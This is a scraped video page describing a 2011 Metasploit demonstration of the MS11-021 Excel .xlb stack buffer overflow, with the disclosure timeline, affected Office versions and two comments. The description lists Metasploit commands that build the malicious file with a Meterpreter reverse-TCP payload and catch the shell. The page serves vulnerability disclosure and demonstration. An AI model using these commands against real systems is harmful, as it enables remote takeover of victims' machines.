MS11-021 Microsoft Office 2007 Excel .xlb Buffer Overflow
Loading...
Uploaded by wowzataz on Nov 6, 2011
Blog : http://eromang.zataz.com
Twitter : http://twitter.com/eromang
Timeline :
Vulnerability discovered and reported to ZDI by Aniway
Vulnerability reported to vendor by ZDI the 2010-10-18
Coordinated release of the vulnerability the 2011-04-12
Metasploit PoC provided the 2011-11-05
PoC provided by:
Aniway
abysssec
sinn3r
juan vazquez
Reference(s) :
CVE-2011-0105
MS11-021
ZDI-11-121
Affected versions :
Microsoft Office XP Service Pack 3
Microsoft Office 2003 Service Pack 3
Microsoft Office 2007 Service Pack 2
Microsoft Office 2010 (32 and 64 bits edition)
Microsoft Office 2004 for Mac
Microsoft Office 2008 for Mac
Microsoft Office for Mac 2011
Open XML File Format Converter for Mac
Microsoft Excel Viewer Service Pack 2
Microsoft Office Compatibility Pack for Word, Excel, and PowerPoint 2007 File Formats Service Pack 2
Tested on Windows XP Pro SP3 with Microsoft Office Excel 2007 (12.0.4518.014)
Description :
This module exploits a vulnerability found in Excel of Microsoft Office 2007. By supplying a malformed .xlb file, an attacker can control the content (source) of a memcpy routine, and the number of bytes to copy, therefore causing a stack- based buffer overflow. This results arbitrary code execution under the context of user the user.
Metasploit demo :
use exploit/windows/fileformat/ms11_021_xlb_bof
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
getuid
sysinfo
- 3 likes, 0 dislikes
-
- 6:14
CVE-2010-397 - Exploit IE CSS using Metasploit's PoCby secur065542 views
- 4:12
INSECT Pro - Exploiting Microsoft Excelby InsecurityResearch908 views
- 7:34
Client Side Exploit for Adobe 9.3 Vulnerabilityby SocialEngineerOrg4,294 views
- 2:22
How to exploit adobe pdf using Metasploitby Snypter622 views
- 3:03
Sfruttare un Buffer Overflow in Winamp 5.12by CovoInformatico491 views
- 11:49
Buffer Overflow Exploit - 1by c2ypt1c2,592 views
- 0:45
office 2003 doc exploit 100% fudby mehrukh7861,254 views
- 2:21
Exploiting CVE 2010-3971 in Windows 7 - VNC Controllerby japtron4,029 views
- 1:40
exploit excel www.opensc.wsby ZeusBotnet2,338 views
- 13:41
MS11-050 IE mshtml!CObjectElement exploit for beginner.by gr4yh4t516 views
- 2:06
Metasploit - Windows 7by DemanRisu13,864 views
- 10:51
Metasploit Pentest Lab - MS08-067 against WinXP SP3by fuzzynop1,304 views
- 2:21
ms11-50_Armitage.aviby pentestit618 views
- 2:01
Assassin's Creed 2 - Trailer de Lanzamientoby AssassinsCreedES595,707 views
- 1:21
wav.movby WAVcollective526,091 views
- 5:57
Démonstration shellcode MS11-021 exploitby DeathShadowDark151 views
- 10:47
Mr Excel & excelisfun Trick 42: Lookup Picture In Excel Formula or VBA?by ExcelIsFun26,459 views
- 1:41
Microsoft MS10-018 Exploit for Obsolete Windows XP SP0by QualysGuard545 views
- 4:20
Acekard on DSiby AceKardTeam143,941 views
- 3:14
Fake extension on Windowsby darkcodersc16,943 views
Good Job :)
renningan666 4 months ago
Hey real nice VIdeo :D easy to understand :)
Snypter 4 months ago